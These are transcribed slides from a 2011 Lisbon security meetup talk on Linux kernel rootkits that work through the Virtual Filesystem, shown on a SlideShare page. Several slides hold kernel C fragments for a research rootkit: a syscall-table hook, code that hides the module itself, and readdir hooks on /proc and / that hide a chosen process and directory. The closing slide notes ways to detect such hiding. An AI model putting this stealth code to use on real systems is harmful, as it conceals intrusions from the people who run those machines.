Confraria SECURITY & IT - Lisbon Set 29, 2011

807 views

Published on

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
807
On SlideShare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
7
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Confraria SECURITY & IT - Lisbon Set 29, 2011

  1. 1. Linux rootkits without syscall patching,(the VFS way)Confraria SECURITY & IT – 28 Set 2011
  2. 2. #> whoami§  Ricardo Mourato – 25 yo§  Computer Science Degree§  InfoSec & SuperBock Stout addicted§  OS X, Slackware, FreeBSD, OpenBSD, Solaris fanatic§  Java, .Net, Python, Ruby, C, C++, ASM Lover§  Windows (All versions) , Perl (All versions) and Printers (Yes, they came from hell !) hater§  root, right here :) 2
  3. 3. Agenda§  Linux rootkits – brief talk§  Linux 2.{5,6} kernel – what changed ?§  The Virtual Filesystem (VFS)§  Meet /proc, our friend!§  Introducing§  Show time J§  Retrospect§  Questions & Answers 3
  4. 4. Linux rootkits – how they were?§  In the beginning… §  User-land Trojaned binaries mostly §  Easy to spot §  Easy to code §  However, hard to hide! §  LRK5 was a good bastard… 4
  5. 5. Linux rootkits – how they were?§  Not so far away… §  The Kernel-land approach §  Loadable Kernel Modules or /dev/kmem “patching” §  Syscall patching §  Easy to code §  Less easy to find Adore & suckit were also good bastards! 5
  6. 6. Linux rootkits – how they were? extern void *sys_call_table[]; int init_module(void) { original_call = sys_call_table[__NR_open]; sys_call_table[__NR_open] = evil_open; return 0; } 6
  7. 7. Linux 2.{5,6} – what changed?§  Main change: §  OMG! sys_call_table[] no longer exported!!! §  Even if you find it, it will be read-only§  Workaround: §  Find IDT §  Find the 0x80 interrupt §  Get the system_call() function location §  Use gdb kung fu and search memory for sys_call_table[] within this function 7
  8. 8. Linux 2.{5,6} – what changed? $ gdb -q /usr/src/linux/vmlinux (no debugging symbols found)...(gdb) disass system_call … 0xc0106bf4 : call *0xc01e0f18(,%eax,4) … (gdb) print &sys_call_table $1 = ( *) 0xc01e0f18 8
  9. 9. The Virtal Filesystem§  Is the primary interface to underlying filesystems (common file model)§  Exports a set of interfaces for every individual filesystem§  Each filesystem must “implement” this interface in order to become a common file model§  Some interesting players are: §  struct dentry; §  struct file_operations; §  struct inode_operations; 9
  10. 10. /proc is our friend§  So… everything in linux “is a file” right? §  Including the ones located at /proc even if “in memory”§  And… most user-land tools rely on /proc to get information! §  This tools include: §  ps §  netstat §  top §  mount §  And many, many others…§  Remember struct file_operations ? J 10
  11. 11. Introducing Fuckit…§  Fu Control Kit (just in case!)§  A research born VFS rootkit capable of: §  Hide itself ß No sh*t sherlock? §  Hide processes §  Hide files and directories §  TTY sniffing 11
  12. 12. Module hiding§  Modules are linked together in a double link list maintained by the kernel§  The kernel have internal functions to “unlink” the unloaded modules from the list§  Just use them wisely J 12
  13. 13. Module hiding static struct module *m = THIS_MODULE; void hideme(void){ kobject_del(&m->mkobj.kobj); list_del(&m->list); } 13
  14. 14. “Hook” the Virtual Filesystem (/proc) static struct file_operations *proc_fops; ß remember again? J void hook_proc(void){ /* we are not /proc yet */ key = create_proc_entry(KEY,0666,NULL); /* now we become /proc :) */ proc = key->parent; /* save the original, we will need it later*/ proc_fops = (struct file_operations *)proc->proc_fops; original_proc_readdir = proc_fops->readdir; /* tha hook */ proc_fops->readdir = fuckit_proc_readdir; } 14
  15. 15. “Hook” the Virtual Filesystem (/) static struct file *f; int hook_root(void){ f = filp_open("/",O_RDONLY,0600); if(IS_ERR(f)){ return -1; } original_root_readdir = f->f_op->readdir; f->f_op->readdir=fuckit_root_readdir; filp_close(f,NULL); return 0; } 15
  16. 16. Process hidingstatic inline int fuckit_proc_filldir(void *__buf, const char *name, int namelen, loff_t offset,u64 ino, unsigned d_type){ //our hidden PID :) if(!strcmp(name,HIDDEN_PID) || !strcmp(name,KEY)){ return 0; }return original_filldir(__buf,name,namelen,offset,ino,d_type);}static inline int fuckit_proc_readdir(struct file *filp, void *dirent, filldir_t filldir){ //save this, we will need to return it later original_filldir = filldir; return original_proc_readdir(filp,dirent,fuckit_proc_filldir);} 16
  17. 17. File and Directory hidingstatic int fuckit_root_filldir(void *__buf, const char *name, int namelen, loff_t offset, u64 ino,unsigned d_type){ //if is our hidden file/directory return nothing! :) if(strncmp(name,HIDDEN_DIR,namelen)==0){ return 0; }return original_root_filldir(__buf,name,namelen,offset,ino,d_type);}static int fuckit_root_readdir(struct file *filp, void *dirent, filldir_t filldir){ //save this, we will need to return it later original_root_filldir = filldir; return original_root_readdir(filp,dirent,fuckit_root_filldir);} 17
  18. 18. Seeing is believing 18
  19. 19. Retrospect§  Syscall patching in 2.6 kernel is a true “pain in the a**”§  VFS hooks, they also do the job!§  It is a good approach, however it has some cons §  It is possible to “brute force” /proc for hidden pids §  You should let the Linux scheduler do this job!§  Hypervisor rootkits will kill -9 every kernel rookits on earth! J 19
  20. 20. References§  IBM developerWorks “Anatomy of the Linux filesystem”. Internet: http://www.ibm.com/developerworks/linux/library/l-linux-filesystem/. [Jan 25, 2011]§  WangYao “Rootkit on Linux x86 v2.6” [Apr 21, 2009]§  Dump “hideme (ng)”. Internet: http://trace.dump.cz/projects.php [Jan 25, 2011]§  Ubra “Process Hiding & The Linux scheduler”. Internet: http://www.phrack.org/issues.html?issue=63&id=18 [Jan 25, 2011] 20
  21. 21. 21
  22. 22. Questions & Answers ? 22

×